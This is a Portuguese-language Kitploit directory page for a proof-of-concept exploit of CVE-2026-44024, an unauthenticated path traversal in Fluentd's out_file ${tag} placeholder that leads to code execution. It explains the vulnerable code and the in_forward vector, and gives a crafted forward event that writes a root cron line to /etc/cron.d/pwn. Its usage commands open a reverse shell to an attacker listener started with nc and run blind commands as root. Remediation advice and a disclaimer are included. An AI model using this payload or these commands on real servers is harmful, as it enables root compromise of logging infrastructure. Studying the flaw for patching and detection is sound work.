Skip to content
KitploitKITPLOIT
FerramentasBlog
Enviar
FerramentasBlog
Enviar

Ferramentas de Hacking, PenTest e Cibersegurança para o seu Arsenal de Segurança!

Kitploit é um diretório de ferramentas de hacking, cibersegurança e pentesting. Descubra as últimas atualizações de projetos para encontrar vulnerabilidades, analisar sistemas, automatizar testes e fortalecer sua segurança.

··Feeds·Contato·Privacidade·© 2026 Kitploit

Diretório de Ferramentas

Categorias

Ver todas as categorias
Loading categories
CVE-2026-44024_exploit — Prova de conceito de exploit para CVE-2026-44024, que utiliza uma tag in_forward especialmente criada para escrever arquivos arbitrários através do path traversal do out_file do Fluentd e disparar execução de comandos. | Kitploit
Ferramentas/GitHubGitHub/0xdak/cve-2026-44024_exploit
Geração de PayloadsAnálise de VulnerabilidadesExploraçãoTestes de PenetraçãoRed Teaming
GitHub0xdak/cve-2026-44024_exploit

CVE-2026-44024_exploit

Prova de conceito de exploit para CVE-2026-44024, que utiliza uma tag in_forward especialmente criada para escrever arquivos arbitrários através do path traversal do out_file do Fluentd e disparar execução de comandos.

Mais Populares

Ver todos →

Descubra as ferramentas mais usadas pela nossa comunidade.

Explore todas as ferramentas

Navegue pela nossa coleção de ferramentas

Ver todas as ferramentas →
Ver Repositório
2há 1 mêsAinda não revisado
Compartilhar

CVE-2026-44024 — Escrita Arbitrária de Arquivos por Path-Traversal no ${tag} do out_file do Fluentd

Escrita arbitrária de arquivos não autenticada no out_file do Fluentd por meio do espaço reservado ${tag}.

out_file permite que operadores modelem o caminho de saída com o espaço reservado ${tag} (por exemplo, path /var/log/fluent/${tag}). Output#extract_placeholders (lib/fluent/plugin/output.rb) substitui a tag do evento no caminho (CWE-22):

sem sanitizar ../
root@kitploit:~
if str.include?('${tag}')
  rvalue = rvalue.gsub('${tag}', metadata.tag)   # attacker-controlled tag, no ../ check

Eventos que chegam pelo protocolo in_forward (porta 24224) carregam uma tag obtida literalmente da mensagem na rede, e allow_anonymous_source tem como padrão true; portanto, um atacante não autenticado pode definir uma tag como ../../../../../../etc/cron.d/pwn para escapar do diretório configurado e escrever em um caminho absoluto arbitrário como o usuário do processo fluentd.

  • Afetados: Fluentd <= 1.19.2
  • Corrigido: 1.19.3 (rejeita componentes ..//absolutos na tag antes de expandir ${tag}, PR #5391)
  • CWE: 22 (Path Traversal) / 94 (Injeção de Código por meio do conteúdo escrito)
  • Portas: 24224 (forward — o vetor), 9880 (http)
  • Impacto: escrita arbitrária de arquivos como o usuário do fluentd → RCE (por exemplo, uma linha de cron de root)

Importante — o vetor é in_forward, não in_http

in_http deriva a tag do caminho da URL com path.split('/').join('.'), o que transforma cada / em . — portanto, ../ não sobrevive no Linux (e %2f não é decodificado). Somente o protocolo forward (24224) passa a tag byte a byte. Este exploit fala o suficiente desse protocolo (uma mensagem msgpack [tag, time, record]) com um mini encoder embutido — sem dependências.

Requisitos

Apenas a biblioteca padrão do Python 3. O alvo deve executar um Fluentd vulnerável com um out_file cujo path contenha ${tag}, e uma fonte in_forward anônima (padrão). Transformar a escrita em um drop de cron limpo requer um out_file que não modifique o nome do arquivo/conteúdo (por exemplo, add_path_suffix false, append true, sem timekey, formato single_value) — caso contrário, use a escrita de arquivo para sobrescrever um arquivo de caminho conhecido.

Uso

root@kitploit:~
# reverse shell (start a listener first: nc -lvnp 4444). Fires via cron within ~60s.
python3 exploit.py 10.10.10.10 --shell 10.10.14.5:4444

# blind command as root
python3 exploit.py 10.10.10.10 -c 'id > /tmp/pwned'

# custom forward port
python3 exploit.py 10.10.10.10:24224 --shell 10.10.14.5:4444

Como funciona

Envia um evento forward ["../../../../../../etc/cron.d/pwn", <time>, {"msg": "* * * * * root <cmd>"}] para a porta 24224. O out_file expande ${tag} → /var/log/fluent/../../../../../../etc/cron.d/pwn = /etc/cron.d/pwn, e (com um formato single_value) grava o msg do registro textualmente → uma linha de cron válida. O cron a executa em ~60 s como o usuário do fluentd (root quando o fluentd roda como root).

Remediação

Atualize o Fluentd para ≥ 1.19.3; não exponha a porta forward a redes não confiáveis (ative a autenticação por chave compartilhada / allow_anonymous_source false); não execute o fluentd como root; evite ${tag} em caminhos de saída para entradas não confiáveis.

Aviso Legal

Apenas para testes de segurança autorizados e fins educacionais. Utilize-o somente contra sistemas seus ou dos quais você tenha permissão explícita para testar.

Baixar ferramenta